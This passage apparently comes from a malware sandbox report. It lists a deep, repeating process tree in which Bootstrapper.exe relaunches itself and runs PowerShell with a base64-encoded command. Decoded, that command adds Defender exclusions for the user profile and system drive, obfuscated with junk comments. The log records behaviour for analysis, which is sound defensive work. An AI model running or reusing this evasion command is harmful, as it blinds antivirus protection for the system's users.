        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        88⤵
        
        PID:8524
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        89⤵
        
        PID:6004
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        89⤵
        
        PID:8596
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        90⤵
        
        PID:5376
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        90⤵
        
        PID:3428
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        91⤵
        
        PID:7404
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        91⤵
        
        PID:8552
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        92⤵
        
        PID:5716
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        92⤵
        
        PID:7184
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        93⤵
        
        PID:7576
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        93⤵
        
        PID:6892
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        94⤵
        
        PID:5784
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        94⤵
        
        PID:5912
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        95⤵
        
        PID:4104
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        95⤵
        
        PID:5444
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        96⤵
        
        PID:8352
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        96⤵
        
        PID:5708
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        97⤵
        
        PID:6664
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        97⤵
        
        PID:6996
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        98⤵
        
        PID:6908
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        98⤵
        
        PID:7604
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        99⤵
        
        PID:4972
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        99⤵
        
        PID:7140
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        100⤵
        
        PID:7276
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        100⤵
        
        PID:3004
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        101⤵
        
        PID:6352
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        101⤵
        
        PID:8868
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        102⤵
        
        PID:5604
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        102⤵
        
        PID:3196
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        103⤵
        
        PID:6728
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        103⤵
        
        PID:8036
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        104⤵
        
        PID:9060
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        104⤵
        
        PID:8756
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        105⤵
        
        PID:3532
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        105⤵
        
        PID:8620
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        106⤵
        
        PID:2476
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        106⤵
        
        PID:3296
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        107⤵
        
        PID:5280
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        107⤵
        
        PID:2784
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        108⤵
        
        PID:8780
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        108⤵
        
        PID:2168
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        109⤵
        
        PID:7584
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        109⤵
        
        PID:4128
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        110⤵
        
        PID:6616
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        110⤵
        
        PID:7732
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        111⤵
        
        PID:7468
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        111⤵
        
        PID:7268
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        112⤵
        
        PID:6176
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        112⤵
        
        PID:3484
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        113⤵
        
        PID:7464
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        113⤵
        
        PID:9128
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        114⤵
        
        PID:5612
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        114⤵
        
        PID:7760
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        115⤵
        
        PID:2492
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        115⤵
        
        PID:7520
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        116⤵
        
        PID:8772
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        116⤵
        
        PID:8028
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        117⤵
        
        PID:1464
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        117⤵
        
        PID:6996
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        118⤵
        
        PID:5920
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        118⤵
        
        PID:7184
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        119⤵
        
        PID:8088
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        119⤵
        
        PID:8924
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        120⤵
        
        PID:4956
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        120⤵
        
        PID:5764
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
